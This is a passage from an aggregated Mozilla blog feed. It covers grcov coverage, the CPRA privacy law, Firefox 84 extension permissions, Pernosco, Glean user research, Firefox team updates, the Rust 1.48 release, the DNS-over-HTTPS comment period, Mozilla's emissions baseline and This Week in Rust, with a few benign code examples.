You can also run grcov outside of your repository; you just need to pass the path to the directory where the profraw files are and the directory where the source is (normally they are the same, but if you have a complex CI setup like we have at Mozilla, they might be totally separate):

grcov PATHS_TO_PROFRAW_DIRECTORIES --binary-path PATH_TO_YOUR_BINARIES_DIRECTORY -s PATH_TO_YOUR_SOURCE_CODE -t html --branch --ignore-not-existing -o ./coverage/

grcov has other options too, simply run it with no parameters to list them.

In grcov’s docs, there are also examples of how to integrate code coverage with some CI services.

Mozilla Open Policy & Advocacy Blog: Four key takeaways to CPRA, California’s latest privacy law

California is on the move again in the consumer privacy rights space. On Election Day 2020, California voters approved Proposition 24, the California Privacy Rights Act (CPRA). CPRA – commonly called CCPA 2.0 – builds upon the less-than-two-year-old California Consumer Privacy Act (CCPA), continuing the momentum to put more control over personal data in people’s hands, adding compliance obligations for businesses, and creating a new California Privacy Protection Agency for regulation and enforcement.

With federal privacy legislation efforts stagnating over the last few years, California continues to set the tone and expectations that lead privacy efforts in the US. Mozilla continues to support data privacy laws that empower people, including the European General Data Protection Regulation (GDPR), the California Consumer Privacy Act (CCPA), and now the California Privacy Rights Act (CPRA). And while CPRA is far from perfect, it does expand privacy protections in some important ways.

Here’s what you need to know. CPRA includes requirements we foresee as truly beneficial for consumers such as additional rights to control their information, including sensitive personal information, data deletion, correcting inaccurate information, and putting resources in a centralized authority to ensure there is real enforcement of violations.

CPRA gives people more rights to opt-out of targeted advertising

We are heartened about the significant new right around “cross-context behavior advertising.” At its core, this right allows consumers to exert more control and opt-out of behavioral, targeted advertising — it will no longer matter if the publisher “sells” their data or not.

This control is one that Mozilla has been a keen and active supporter of for almost a decade: from our efforts with the Do Not Track mechanism in Firefox, to Enhanced Tracking Protection, to our support of the Global Privacy Control experiment. However, this right is not exercised by default – users must take the extra step of opting in to benefit from it.

CPRA abolishes “dark patterns”

Another protection the CPRA brings is prohibiting the use of “dark patterns” or features of interface design meant to trick users into doing things that they might not want to do, but ultimately benefit the business in question. Dark patterns are used in websites and apps to give the illusion of choice, but in actuality are deliberately designed to deceive people.

For instance, privacy-preserving options — like opting out of tracking by companies — often take multiple clicks and require navigating multiple screens to finally get to the opt-out button, while the option to accept the tracking is one simple click. This is only one of many types of dark patterns. This behavior fosters distrust in the internet ecosystem and is patently bad for people and the web. And it needs to go. Mozilla also supports federal legislation that has been introduced to ban dark patterns.

CPRA introduces a new watchdog for privacy protection

The CPRA establishes a new data protection authority, the “California Privacy Protection Agency” (CPPA), the first of its kind in the US. This will improve enforcement significantly compared to what the currently responsible CA Attorney General is able to do, with limited capacity and priorities in other fields. The CPRA designates funds to the new agency that are expected to be around $100 million. How the CPRA will be interpreted and enforced will depend significantly on who makes up the five-member board of the new agency, to be created by mid-2021. Two of the board seats (including the chair) will be appointed by Gov. Newsom, one seat will be appointed by the attorney general, another by the Senate Rules Committee, and the fifth by the Speaker of the Assembly, to be filled in about 90 days.

CPRA requires companies to collect less data

CPRA requires businesses to minimize the collection of personal data (collect the least amount needed) — a principle Mozilla has always fostered internally and externally as core to our values, products and services. While the law doesn’t elaborate how this will be monitored and enforced, we think this principle is a good first step in fostering lean data approaches.

However, the CPRA in its current form still puts the responsibility on consumers to opt-out of the sale and retention of personal data. Also, it allows data-processing businesses to create exemptions from the CCPA’s limit on charging consumers differently when they exercise their privacy rights. Both provisions do not correspond to our goal of “privacy as a default”.

CPRA becomes effective January 1, 2023 with a look back period to January 2022. Until then, its provisions will need lots of clarification and more details, to be provided by lawmakers and the new Privacy Protection Agency. This will be hard work for many, but we think the hard work is worth the payoff: for consumers and for the internet.


Mozilla Addons Blog: Extensions in Firefox 84

Here are our highlights of what’s coming up in the Firefox 84 release:

Manage Optional Permissions in Add-ons Manager

As we mentioned last time, users will be able to manage optional permissions of installed extensions from the Firefox Add-ons Manager (about:addons).

Optional permissions in about:addons

We recommend that extensions using optional permissions listen for browser.permissions.onAdded and browser.permissions.onRemoved API events. This ensures the extension is aware of the user granting or revoking optional permissions.
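
For example, a background script can keep a feature in sync with what the user has granted. The browser.permissions.onAdded and browser.permissions.onRemoved events are the real API surface; the "history" permission and the enable/disable helpers below are hypothetical, purely for illustration:

// Sketch: react to the user granting or revoking an optional permission.
function enableHistoryFeature() { console.log("history permission granted"); }   // hypothetical helper
function disableHistoryFeature() { console.log("history permission revoked"); }  // hypothetical helper

browser.permissions.onAdded.addListener((permissions) => {
  if ((permissions.permissions || []).includes("history")) {
    enableHistoryFeature();
  }
});

browser.permissions.onRemoved.addListener((permissions) => {
  if ((permissions.permissions || []).includes("history")) {
    disableHistoryFeature();
  }
});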

Thanks

We would like to thank Tom Schuster for his contributions to this release.


Robert O'Callahan: Debugging With Screenshots In Pernosco

When debugging graphical applications it can be helpful to see what the application had on screen at a given point in time. A while back we added this feature to Pernosco.

This is nontrivial because in most record-and-replay debuggers the state of the display (e.g., the framebuffer) is not explicitly recorded. In rr for example, a typical application displays content by sending data to an X11 server, but the X11 server is not part of the recording.

Pernosco analyzes the data sent to the X11 server and reconstructs the updates to window state. Currently it only works for simple bitmap copies, but that's enough for Firefox, Chrome and many other modern applications, because the more complicated X drawing primitives aren't suitable for those applications and they do their complex drawing internally.

Pernosco doesn't just display the screenshots, it helps you debug with them. As shown in the demo, clicking on a screenshot shows a pixel-level zoomed-in view which lets you see the exact channel values in each pixel. Clicking on two screenshots highlights the pixels in them that are different. We know where the image data came from in memory, so when you click on a pixel we can trace the dataflow leading to that pixel and show you the exact moment(s) the pixel value was computed or copied. (These image debugging tools are generic and also available for debugging Firefox test failures.) Try it yourself!

Try Pernosco on your own code today!

Data@Mozilla: This Week in Glean: Fantastic Facts and where to find them

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

We have been working on Glean for a few years now, starting with an SDK with Android support and increasing our SDK platform coverage by implementing our core in Rust and providing language bindings for other platforms, well beyond the mobile space.

Before our next major leaps (FOG, Glean.js), we wanted to understand what our internal consumers thought of Glean: what challenges are they facing? Are we serving them well?

Disclaimer: I’m not a user researcher, and  I did my best to study (and practice!) how to make sure our team’s and our customers’ time investment would not be wasted, but I might have still gotten things wrong! “Interviewing Users: How to Uncover Compelling Insights” by Steve Portigal really helped me to put things into perspective and get a better understanding of the process!

Here’s what I learned from trying to understand how users work with Glean:

1. Rely on user researchers!

Humans can ask questions, that’s a fact.. right?

Yes, but that’s not sufficient to understand users and how they interact with the product. Getting a sense of what works for them and what doesn’t is much more difficult than asking “What would you like our product to do?”.

If your team has access to UX researchers, join efforts and get together to better understand your users 🙂

2. Define who to interview

Since I am in the Glean SDK team, we did not interview any of my team peers.

Glean has a very diverse user base: product managers, developers, data scientists, data engineers. All of them are using the Glean SDK, Pipeline and Tools in slightly different ways!

We decided to select representatives throughout Mozilla for each group. Moreover, we did not necessarily want feedback exclusively from people who already used Glean. Mozilla has a legacy telemetry system in Firefox most of the company was exposed to, so we made sure to include both existing Glean users and prospective Glean users.

We narrowed down the list to about 60 candidates, which was then refined to 50 candidates.

3. Logistics is important!

Before starting collecting feedback using the interview process, we tried to make sure that everything was in place to provide a smooth experience both for us and the interviewed folks, since all the interviews were performed online:

  • we set up a shared calendar to let interviewers grab interview slots;
  • we set up a template for a note-taking document, attempting to set a consistent style for all the notes;
  • we documented the high level structure of the interview: introduction (5 minutes) + conversation (30 minutes) + conclusions (5 minutes);
  • we set up email templates for inviting people to the interview; it included information about the interview, a link to an anonymous preliminary questionnaire (see the next point), a link to join the video meeting and a private link to the meeting notes.

4. Provide a way to anonymously send feedback

We knew that interviewing ~50 folks would take time, so we tried to get early feedback by sending an email to the engineering part of the company asking for feedback. By making the questionnaire anonymous, we additionally tried to make folks feel more comfortable in providing honest feedback (and criticism!). We allowed participants to flag other participants and left it open during the whole interview process. Some of the highlights were duplicated between the interviews and the questionnaire, but the latter got us a few insights that we were not able to capture in live interviews.

5. Team up!

Team support was vital during the whole process, as each interview required at least two people in addition to the interviewed one: the interviewer (the person actually focusing on the conversation) and the note taker. This allowed the interviewer to exclusively pay attention to the conversation, keeping track of the context and digging into aspects of the conversation that they deemed interesting. At the end of each interview, in the last 5 minutes, the note taker would ask any remaining questions or details.

6. Prepare relevant base questions

To consistently interview folks, we prepared a set of base questions to use in all the interviews. A few questions from this list would be different depending on the major groups of interviewees we identified: data scientists (both who used and not used Glean), product managers, developers (both who used and not used Glean).

We ended up with a list of 10 questions, privileging open-ended questions and avoiding leading or closed questions (well, except for the “Have you ever used Glean” part 🙂 ).

7. Always have post-interview sync ups

Due to the split between the note-taker and the interviewer, it was vital for us to have 15 minutes, right after the interview, to fill in missing information in the notes and share the context between the interviewing members.

We learned after the initial couple of interviews that the more we waited for the sync up meeting, the more the notes appeared foggy in our brain.

8. Review and work on notes as you go

While we had post-interview sync-ups, all the findings from each interview were noted down together with the notes document for that interview. After about 20 interviews, we realized that all the insights needed to be in a single report: that took us about a week to do, at the end of the interviewing cycle, and it would have been much faster to note them down in a structured format after each interview.

Well, we learn by making mistakes, right?

9. Publish the results

The interviews were a goldmine of discoveries: our assumptions were challenged in many areas, giving us a lot of food for thought. Our findings did not exclusively touch our team! For this reason we decided to create a presentation and disseminate the information about our process and its results in a biweekly meeting in our Data Org.

The raw insights have so far been shared with the relevant teams, who are triaging them.

10. Make the insights REALLY actionable

Our team is still working on this 🙂 We have received many insights from this process and are figuring out how to guarantee that all of them are considered and don’t fall back in our team’s backlog. We are considering reserving bandwidth to specifically address the most important ones on a monthly basis.

Many of the findings already informed our current choices and designs, some of them are changing our priorities and sparking new conversations in our whole organization.

We believe that getting user feedback early in the process is vital: part of this concern is eased by our proposal culture (before we dive into development, we asynchronously discuss with all the stakeholders on shared documents with the intent of ironing out the design, together!) but there’s indeed huge value in performing more frequent interviews (maybe on a smaller number of folks) with all the different user groups.

Firefox Nightly: These Weeks in Firefox: Issue 83

Highlights

Friends of the Firefox team

Resolved bugs (excluding employees)

Fixed more than one bug

  • Andrey Bienkowski
  • Ben D (:rockingskier)
  • Chris Jackson
  • Cody Welsh
  • Fabien Casters [:vaga]
  • Hunter Jones
  • Itiel
  • Martin Stránský [:stransky]
  • Michael Goossens
  • Niklas Baumgardner
  • Tim Nguyen :ntim
  • Tom Schuster [:evilpie]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Fixed an issue with built-in themes disappearing for one session after upgrading to Firefox 82 (fixed by Bug 1672314, caught due to the recent changes to the theme resource URLs introduced in Bug 1660557)
  • Some minor follow-ups related to the new verified and mozilla badges in the about:addons extensions list (Bug 1666042, Bug 1666503)
  • Itiel contributed an RTL-related followup fix for the optional permissions list part of the about:addons detail view (Bug 1672502, follow up for Bug 1624513)
  • ntim contributed some small refactoring for about:addons (Bug 1676292, Bug 1677530), in preparation for completely removing the remaining bits of the legacy XUL-based about:addons page
WebExtensions Framework
  • Landed a fix to make sure that the extension messaging Ports are garbage collected when the related extension content is destroyed (Bug 1652925)
  • Brad Werth made sure that the extension popups and sidebar panels can be zoomed using the Ctrl-scroll wheel as in the browser tabs (Bug 1634556)
  • Mark Banner made sure we reset/restore the default search engine when an add-on that had overridden it is uninstalled at early startup (Bug 1643858)
WebExtension APIs
  • Tom Schuster extended the browsingData API to support clearing the browsing data for a specific contained tab using a new optional cookieStoreId parameter (Bug 1670811, + follow up fix from Bug 1675643)

Bookmarks

  • “Other Bookmarks” Folder in Bookmarks Toolbar – If users have bookmarks stored in Other Bookmarks, a button for it will appear in the bookmarks toolbar (bug). An option to hide this folder from the toolbar is currently in progress (bug).
  • Bookmarks are stored in the Bookmarks Toolbar by default – For new users, the default location for storing bookmarks is now in the bookmarks toolbar (bug).
  • “Import Bookmarks” Button – New profiles will display an “import” button on the bookmarks toolbar (bug).
  • Showing the Bookmarks Toolbar on the New Tab page by default and replacing the Bookmarks Toolbar hide/show toggle – New options for showing the bookmarks toolbar: “Always”, “Never”, and “Only on New Tab” (bug).
  • A message describing the Bookmarks Toolbar and linking to the library is shown on the toolbar when it is blank – If there are any bookmarks in the “Bookmarks Toolbar” folder or any other widgets on the toolbar, this message will not be shown (the “Other Bookmarks” symlink folder does not count). (Screenshot: the Other Bookmarks button, a folder icon, on the far right of the bookmarks toolbar.)

Developer Tools

  • Network Panel – Introducing a top-level error component responsible for catching exceptions and rendering details, a stack trace, and a link for filing a Bugzilla report (bug). (Screenshot: the Network panel indicates that it has crashed, with a large "File Bug Report" button, and lists the stack and the TypeError that caused the crash.)
  • Performance panel – Building a simple on-boarding UI for the new performance panel (bug). The new profiler panel is based on the Firefox Profiler: profiler.firefox.com. (Screenshot: the Performance panel has a start-recording button that launches into the profiler and a settings dropdown, matching the layout of the profiler toolbar button.)
  • Accessibility Panel – showing tab order on the current page, done by Yura Zenevich (bug), shipped in Firefox 84. (Screenshot: the Accessibility panel marks different components on a Google homepage, numbered underneath to reflect the tab order on the page.)
  • DevTools Fission – Making DevTools Fission compatible
  • Fission tests are now enabled on tier 1 (bug)
  • Continue making DevTools Fission compatible (wiki with known issues)
  • The project has 6 MVP items remaining, planned for completion during Dec 14 – Dec 20
  • Marionette Fission – Making Marionette (the automation driver for Firefox) Fission compatible
  • The project has 13 MVP items remaining, planned for completion during Nov 09 – Nov 22
  • Enabling Marionette’s new Fission-compatible implementation (based on JSWindowActors) fixed a memory leak and improved performance by 15-20% across all platforms (bug).

Installer & Updater

  • mhowell is wrapping up work on the semaphore, to prevent multiple instances from updating each other, and to let the user know when Firefox can’t update as a result
  • agashlin landed a new uninstall ping, so we should get more information about users explicitly leaving Firefox (as opposed to silently ceasing to use Firefox)

Lint

  • Sonia enabled all ESLint rules for widget/tests/*.xhtml – these were files where we had postponed fixing all the ESLint issues when moving from XUL to XHTML.
  • Kris made it so that the ESLint list of services that are accessible via Services.* is now semi-automatically generated.

Password Manager

  • Tgiles landed Bug 1613620 – allowing users to remove/delete all stored logins/passwords

PDFs & Printing

  • emalysz updated the print dialog so it stays open if the user cancels choosing a filename for print-to-PDF
  • emalysz updated the error handling so it allows changing the destination and cancelling the print if a setting is invalid
  • emalysz updated the custom margin settings to account for the printed page orientation
  • nordzilla added support for duplex printing (print on both sides)
  • emilio fixed a bug where printing using the system dialog failed for about: pages
  • emalysz fixed a bug where changing the paper size with custom margins set could result in an error without it being displayed to the user

Performance

Performance Tools

  • Added shortcuts for call tree transforms. (Screenshot: the context menu includes call tree transforms, the ability to search on Searchfox, copy the function name, and copy the stack.)
  • Added a keyboard shortcut panel that is revealed by the shortcut “?”. (Screenshot: the keyboard shortcuts panel shows shortcuts for the call tree, the flame graph, the timeline, call tree transforms, and the marker table.)
  • “Profile Info” panel now includes how many physical and logical CPU cores there are on the profiled machine. (Screenshot: a platform popup shows the OS, the ABI, and CPU information such as the number of physical and logical cores.)

Picture-in-Picture

Push

  • We are working with Ops and QA to coordinate testing (and to set up a staging server) for a major port of the Push Endpoint logic from Python to Rust, which was completed this past summer. Kudos to our intern mdrobnak for successfully completing this massive project. We expect to deploy to production in early 2021.

Search and Navigation

  • We’re running a holdback experiment to measure the impact of the new search mode feature on Release
  • We’re also working on various experiments related to vertical search in the Address Bar, both with partners, and with cool utils (weather, calculator, unit conversions)
  • Tweaked the tab-to-search onboarding result to not be dismissed too easily; now it requires 3 interactions (simply selecting the result counts as one) – Bug 1675611
  • Based on user-testing feedback, mostly to reduce the surprise impact, empty strings in search mode no longer show the last executed searches – Bug 1675537
  • Search mode colors are now inverted on the Dark theme – Bug 1671668
  • @keywords can now be completed with the Tab key – Bug 1669526
  • URL canonization (CTRL+Enter) no longer happens if a CTRL+V just happened and CTRL was not released before pressing Enter – Bug 1661000
  • Fixed an issue in both the search bar and the address bar causing the last keyup event to reach content – Bug 1641287, Bug 1673299
  • Fixed a regression where single words (like “space”) in search mode could open the “Did you mean to go to space” notification bar in case of a wildcard DNS. – Bug 1672509

Sync

  • The tokenserver (which runs Python 2.7 and supports Firefox Sync) is being ported to Rust in Q4. You can follow along with progress here.
  • A minor change was made to our batch commit limit to better work with Spanner. See the Spanner docs for more details on mutation limits.

User Journey

WebRTC UI

  • The new WebRTC global indicator goes out for macOS and Windows today! \o/
    • This means system tray indicator icons for Windows, as well as an always-on-top indicator when sharing a display.
    • There are also global mutes for the microphone and camera, but these are off by default.

 

The Rust Programming Language BlogAnnouncing Rust 1.48.0

The Rust team is happy to announce a new version of Rust, 1.48.0. Rust is a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.48.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.48.0 on GitHub.

What's in 1.48.0 stable

The star of this release is Rustdoc, with a few changes to make writing documentation even easier! See the detailed release notes to learn about other changes not covered by this post.

Easier linking in rustdoc

Rustdoc, the library documentation tool included in the Rust distribution, lets you write documentation in Markdown. This makes it very easy to use, but also has some pain points. Let's say that you are writing some documentation for some Rust code that looks like this:

pub mod foo {
    pub struct Foo;
}

pub mod bar {
    pub struct Bar;
}

We have two modules, each with a struct inside. Imagine we wanted to use these two structs together; we may want to note this in the documentation. So we'd write some docs that look like this:

pub mod foo {
    /// Some docs for `Foo`
    ///
    /// You may want to use `Foo` with `Bar`.
    pub struct Foo;
}

pub mod bar {
    /// Some docs for `Bar`
    ///
    /// You may want to use `Bar` with `Foo`.
    pub struct Bar;
}

That's all well and good, but it would be really nice if we could link to these other types. That would make it much easier for the users of our library to navigate between them in our docs.

The problem here is that Markdown doesn't know anything about Rust, and the URLs that rustdoc generates. So what Rust programmers have had to do is write those links out manually:

pub mod foo {
    /// Some docs for `Foo`
    ///
    /// You may want to use `Foo` with [`Bar`].
    ///
    /// [`Bar`]: ../bar/struct.Bar.html
    pub struct Foo;
}

pub mod bar {
    /// Some docs for `Bar`
    ///
    /// You may want to use `Bar` with [`Foo`].
    ///
    /// [`Foo`]: ../foo/struct.Foo.html
    pub struct Bar;
}

Note that we've also had to use relative links, so that this works offline. Not only is this process tedious, and error prone, but it's also just wrong in places. If we put a pub use bar::Bar in our crate root, that would re-export Bar in our root. Now our links are wrong. But if we fix them, then they end up being wrong when we navigate to the Bar that lives inside the module. You can't actually write these links by hand, and have them all be accurate.

In this release, you can use some syntax to let rustdoc know that you're trying to link to a type, and it will generate the URLs for you. Here are two different examples, based off of our code before:

pub mod foo {
    /// Some docs for `Foo`
    ///
    /// You may want to use `Foo` with [`Bar`](crate::bar::Bar).
    pub struct Foo;
}

pub mod bar {
    /// Some docs for `Bar`
    ///
    /// You may want to use `Bar` with [`crate::foo::Foo`].
    pub struct Bar;
}

The first example will show the same text as before; but generate the proper link to the Bar type. The second will link to Foo, but will show the whole crate::foo::Foo as the link text.

There are a bunch of options you can use here. Please see the "Linking to items by name" section of the rustdoc book for more. There is also a post on Inside Rust on the history of this feature, written by some of the contributors behind it!

Adding search aliases

You can now specify #[doc(alias = "<alias>")] on items to add search aliases when searching through rustdoc's UI. This is a smaller change, but still useful. It looks like this:

#[doc(alias = "bar")]
struct Foo;

With this annotation, if we search for "bar" in rustdoc's search, Foo will come up as part of the results, even though our search text doesn't have "Foo" in it.

An interesting use case for aliases is FFI wrapper crates, where each Rust function could be aliased to the C function it wraps. Existing users of the underlying C library would then be able to easily search the right Rust functions!

Library changes

The most significant API change is kind of a mouthful: [T; N]: TryFrom<Vec<T>> is now stable. What does this mean? Well, you can use this to try and turn a vector into an array of a given length:

use std::convert::TryInto;

let v1: Vec<u32> = vec![1, 2, 3];

// This will succeed; our vector has a length of three, we're trying to
// make an array of length three.
let a1: [u32; 3] = v1.try_into().expect("wrong length");

// But if we try to do it with a vector of length five...
let v2: Vec<u32> = vec![1, 2, 3, 4, 5];

// ... this will panic, since we have the wrong length.
let a2: [u32; 3] = v2.try_into().expect("wrong length");

In the last release, we talked about the standard library being able to use const generics. This is a good example of the kinds of APIs that we can add with these sorts of features. Expect to hear more about the stabilization of const generics soon.

Additionally, five new APIs were stabilized this release:

The following previously stable APIs have now been made const:

See the detailed release notes for more.

Other changes

There are other changes in the Rust 1.48.0 release: check out what changed in Rust, Cargo, and Clippy.

Contributors to 1.48.0

Many people came together to create Rust 1.48.0. We couldn't have done it without all of you. Thanks!

Mozilla Open Policy & Advocacy BlogMozilla DNS over HTTPS (DoH) and Trusted Recursive Resolver (TRR) Comment Period: Help us enhance security and privacy online

For a number of years now, we have been working hard to update and secure one of the oldest parts of the Internet, the Domain Name System (DNS). We passed a key milestone in that endeavor earlier this year, when we rolled out the technical solution for privacy and security in the DNS – DNS-over-HTTPS (DoH) – to Firefox users in the United States. Given the transformative nature of this technology and our mission commitment to transparency and collaboration, we have consistently sought to implement DoH thoughtfully and inclusively. Therefore, as we explore how to bring the benefits of DoH to Firefox users in different regions of the world, we’re today launching a comment period to help inform our plans.

Some background

Before explaining our comment period, it’s first worth clarifying a few things about DoH and how we’re implementing it:

What is the ‘DNS’?

The Domain Name System (DNS for short) is a shared, public database that links a human-friendly name, such as www.mozilla.org, to a computer-friendly series of numbers, called an IP address (e.g. 192.0.2.1). By performing a “lookup” in this database, your web browser is able to find websites on your behalf. Because of how DNS was originally designed decades ago, browsers doing DNS lookups for websites — even for encrypted https:// sites — had to perform these lookups without encryption.
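
For readers who want to see this in code, here is a minimal sketch of such a lookup using Python's standard library; the hostname is only an example, and the operating system's resolver does the actual work:

import socket

# Ask the OS resolver to translate a human-friendly name into IP addresses --
# the same kind of unencrypted lookup browsers have traditionally relied on.
for family, _, _, _, sockaddr in socket.getaddrinfo("www.mozilla.org", 443,
                                                    type=socket.SOCK_STREAM):
    print(sockaddr[0])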

What are the security and privacy concerns with traditional DNS?

Because there is no encryption in traditional DNS, other entities along the way might collect (or even block or change) this data. These entities could include your Internet Service Provider (ISP) if you are connecting via a home network, your mobile network operator (MNO) if you are connecting on your phone, a WiFi hotspot vendor if you are connecting at a coffee shop, and even eavesdroppers in certain scenarios.

In the early days of the Internet, these kinds of threats to people’s privacy and security were known, but not being exploited yet. Today, we know that unencrypted DNS is not only vulnerable to spying but is being exploited, and so we are helping the Internet to make the shift to more secure alternatives. That’s where DoH comes in.

What is DoH and how does it mitigate these problems?

Following the best practice of encrypting HTTP traffic, Mozilla has worked with industry stakeholders at the Internet Engineering Task Force (IETF) to define a DNS encryption technology called DNS over HTTPS or DoH (pronounced “dough”), specified in RFC 8484. It encrypts your DNS requests, and responses are encrypted between your device and the DNS resolver via HTTPS. Because DoH is an emerging Internet standard, operating system vendors and browsers other than Mozilla can also implement it. In fact, Google, Microsoft and Apple have either already implemented or are in late stages of implementing DoH in their respective browsers and/or operating systems, making it a matter of time before it becomes a ubiquitous standard to help improve security on the web.
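
To make this more concrete, here is a rough sketch of what a DoH lookup can look like from code, using Python's standard library and the JSON-formatted query interface that several public resolvers expose alongside the RFC 8484 wire format. The Cloudflare endpoint and the response fields shown are illustrative assumptions, not part of Firefox's implementation:

import json
import urllib.request

# A DNS query for mozilla.org carried over HTTPS instead of cleartext UDP/TCP.
url = "https://cloudflare-dns.com/dns-query?name=mozilla.org&type=A"
request = urllib.request.Request(url, headers={"accept": "application/dns-json"})

with urllib.request.urlopen(request) as response:
    reply = json.load(response)

# The resolver's answer section, if present, maps the name to IP addresses.
for record in reply.get("Answer", []):
    print(record.get("name"), record.get("data"))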

How has Mozilla rolled out DoH so far?

Mozilla has deployed DoH to Firefox users in the United States, and as an opt-in feature for Firefox users in other regions. We are currently exploring how to expand deployment beyond the United States. Consistent with Mozilla’s mission, in countries where we roll out this feature the user is given an explicit choice to accept or decline DoH, with a default-on orientation to protect user privacy and security.

Importantly, our deployment of DoH adds an extra layer of user protection beyond simple encryption of DNS lookups. Our deployment includes a Trusted Recursive Resolver (TRR) program, whereby DoH lookups are routed only to DNS providers who have made binding legal commitments to adopt extra protections for user data (e.g., to limit data retention to operational purposes and to not sell or share user data with other parties). Firefox’s deployment of DoH is also designed to respect ISP-offered parental control services where users have opted into them, and it offers techniques to operate with enterprise deployment policies.

The comment period

As we explore bringing the benefits of DoH to more users, in parallel, we’re launching a comment period to crowdsource ideas, recommendations, and insights that can help us maximise the security and privacy-enhancing benefits of our implementation of DoH in new regions. We welcome contributions from anyone who cares about the growth of a healthy, rights-protective and secure Internet.

Engaging with the Mozilla DoH implementation comment period

  • Length: The global public comment period will last for a total of 45 days, starting from November 19, 2020 and ending on January 4, 2021.
  • Audience: The consultation is open to all relevant stakeholders interested in a more secure, open and healthier Internet across the globe.
  • Questions for Consultation: A detailed set of questions which serve as a framework for the consultation are available here. It is not mandatory to respond to all questions.
  • Submitting comments: All responses can be submitted in plaintext or in the form of an accessible pdf to doh-comment-period-2020@mozilla.com.

Unless the author/authors explicitly opt-out in the email in which they submit their responses, all genuine responses will be made available publicly on our blog. Submissions that violate our Community Participation Guidelines will not be published.

Our goal is that DoH becomes as ubiquitous for DNS as HTTPS is for web traffic, supported by ISPs, MNOs, and enterprises worldwide to help protect both end users and DNS providers themselves. We hope this public comment period will take us closer to that goal, and we look forward to hearing from stakeholders around the world in creating a healthier Internet.

The post Mozilla DNS over HTTPS (DoH) and Trusted Recursive Resolver (TRR) Comment Period: Help us enhance security and privacy online appeared first on Open Policy & Advocacy.

The Mozilla BlogRelease: Mozilla’s Greenhouse Gas emissions baseline

When we launched our Environmental Sustainability Programme in March 2020, we identified three strategic goals:

  1. Reduce and mitigate Mozilla’s organisational impact;
  2. Train and develop Mozilla staff to build with sustainability in mind;
  3. Raise awareness for sustainability, internally and externally.

Today, we are releasing our baseline Greenhouse Gas emissions (GHG) assessment for 2019, which forms the basis upon which we will build to reduce and mitigate Mozilla’s organisational impact.

 

GHG Inventory: Summary of Findings

Mozilla’s overall emissions in 2019 amounted to: 799,696 mtCO2e (metric tons of carbon dioxide equivalent).

    • Business Services and Operations: 14,222 mtCO2e
      • Purchased goods and services: 8,654 mtCO2e
      • Business travel: 2,657 mtCO2e
      • Events: 1,199 mtCO2e
      • Offices and co-locations: 1,195 mtCO2e
      • Remotees: 194 mtCO2e
      • Commute: 147 mtCO2e
    • Product use: 785,474 mtCO2e

 

How to read these emissions

There are two major buckets:

  1. Mozilla’s impact in terms of business services and operations, which we calculated with as much primary data as possible;
  2. The impact of the use of our products, which makes up roughly 98% of our overall emissions.
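
As a quick check, the split above follows directly from the category totals in the inventory; a few lines of Python reproduce the rounded percentages:

total = 799_696        # overall 2019 emissions, mtCO2e
business_ops = 14_222  # business services and operations, mtCO2e
product_use = 785_474  # product use, mtCO2e

print(f"business ops: {business_ops / total:.1%}")  # ~1.8%, rounded to 2%
print(f"product use:  {product_use / total:.1%}")   # ~98.2%, rounded to 98%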

In 2019, the use of products spanned Firefox Desktop and Mobile, Pocket, and Hubs.

Their impact is significant, and it is an approximation. We can’t yet really measure the energy required to run and use our products specifically. Instead, we are estimating how much power is required to use the devices needed to access our products for the time that we know people spent on our products. In other words, we estimate the impact of desktop computers, laptops, tablets, or phones while being online overall.

For now, this helps us get a sense of the impact the internet is having on the environment. Going forward, we need to figure out how to reduce that share while continuing to grow and make the web open and accessible to all.

The emissions related to our business services and operations cover all other categories from the GHG protocol that are applicable to Mozilla.

For 2019, this includes 10 offices and 6 co-locations, purchased goods and services, events that we either host or run, all of our commercial travel including air, rail, ground transportation, and hotels, as well as estimates of the impact of our remote workforce and the commute of our office employees, which we gathered through an internal survey.

 

How we look at this data

  1. It’s easy to lose sight of all the work we’ve got to do to reduce our business services and operations emissions, if we only look at the overarching distribution of our emissions. (Chart: pie chart visualising a 2% impact for Business Services and Operations and 98% for Product Use.)
  2. If we zoom in on our business services and operations emissions, we’ll note that our average emissions per employee are: 12 mtCO2e.
  3. There is no doubt plenty of room for improvement. Our biggest area for improvement will likely be the Purchased Goods and Services category. Think: more local and sustainable sourcing, switching to vendors with ambitious climate targets and implementation plans, prolonging renewal cycles, and more. 
  4. In addition, we need to significantly increase the amount of renewable energy we procure for Mozilla spaces, which in 2019 was at: 27%.
  5. And while a majority of Mozillians already opt for a low-carbon commute, we’ll explore additional incentives here, too. (Chart: column chart listing the percentages of different commute modes globally.)
  6. We will also look at our travel and event policies to determine where we add the most value, which trip is really necessary, how we can improve virtual participation, and where we have space for more local engagement.

You can find the longform, technical report in PDF format here.

We’ll be sharing more about what we learned from our first GHG assessment, how we’re planning to improve and mitigate our impact soon. Until then, please reach out to the team should you have any questions at sustainability@mozilla.com.

The post Release: Mozilla’s Greenhouse Gas emissions baseline appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 365

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Tooling
Observations/Thoughts
Rust Walkthroughs
Project Updates
Miscellaneous

Crate of the Week

This week's crate is lingua, an ngrams-based natural language detector.

Thanks to Willi Kappler for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

299 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-11-10: 1 Regression, 2 Improvements, 2 mixed

A mixed week with improvements still outweighing regressions. Perhaps the biggest highlight was the move to compiling rustc crates with the initial-exec TLS model which results in fewer calls to _tls_get_addr and thus faster compile times.

See the full report for more.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

